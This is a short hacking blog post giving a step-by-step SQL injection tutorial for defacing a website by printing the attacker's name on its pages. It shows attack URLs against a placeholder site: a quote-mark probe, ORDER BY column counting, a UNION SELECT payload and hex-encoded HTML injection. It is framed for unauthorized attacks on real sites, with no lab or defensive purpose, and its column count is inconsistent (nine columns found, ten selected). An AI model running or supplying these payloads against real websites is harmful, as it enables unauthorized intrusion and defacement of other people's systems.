Tuesday, October 27, 2015

How to Print your name on screen Sqli Injection!

Welcome Back to TechynHacky. :-)

I'm Asman and today I'm gonna show you "how to print your name on screen Sqli Injection" some time we need to write your name on screen to show we injected this website. anyway i hope you know about this :D
So lets start :v

Requirements:

1.Hackbar.
2.Vulnerable Website. :-)
3.Basic Knowledge of course :-P

For Example:
Here I have one. :-)

http://www.vul-site.com/events/event-detail.php?id=123

Step 1:
we need to check that the site,we chose vulnerable or not.
To check we need to put ' at the end of the website.
Like This,

http://www.vul-site.com/events/event-detail.php?id=123'

if you got any sqli error its mean this website is vulnerable so we can inject this :)
As we chose a SQLi Vulnerable site so We surely will get error. :-D

But now topic is how to print your name on screen!

Step 2:

now we need to find order number for this using this command [order by 1--+-   ]
Like this--

http://www.vul-site.com/events/event-detail.php?id=123 order by 1--+-  (no error)

http://www.vul-site.com/events/event-detail.php?id=123 order by 2--+-  (no error)

http://www.vul-site.com/events/event-detail.php?id=123 order by 10 (error)

its mean it have 9 orders. :-)

Step 3:

now replace order and go to UNION BASED and select UNION STATEMENT and enter order number.
For ex:

http://www.vul-site.com/events/event-detail.php?id=123 union all select 1,2,3,4,5,6,7,8,9,10 --+-

Now we will get vulnerable table.

Step 4:Suppose table number is 3 .

5. Now in url,replace 3 number and write some html code like this--

<font color="red" size="10"> Injected By 'Därk Légènd' </font>

Now copy this code and replace 'Därk Légènd' with your own cyber name and put it in.
Step 6: Now select all html code and go to => Encoding => HexEncoding => String to 00f00 first option.

when you are converting html code in to hexEncoding then put 0x before html code.

NOTE:
If you are using Phone or something which don't have hackbar.
Then use online tools or App/software to convert your html code to HexCoding. :-)

Step 7: Click Execute then yourname is printed there :-)

Hope you liked this :-)
Thanks for visiting and reading.. :-)

Posted by at
Labels: , ,

No comments:

Post a Comment

Subscribe to: Post Comments (Atom)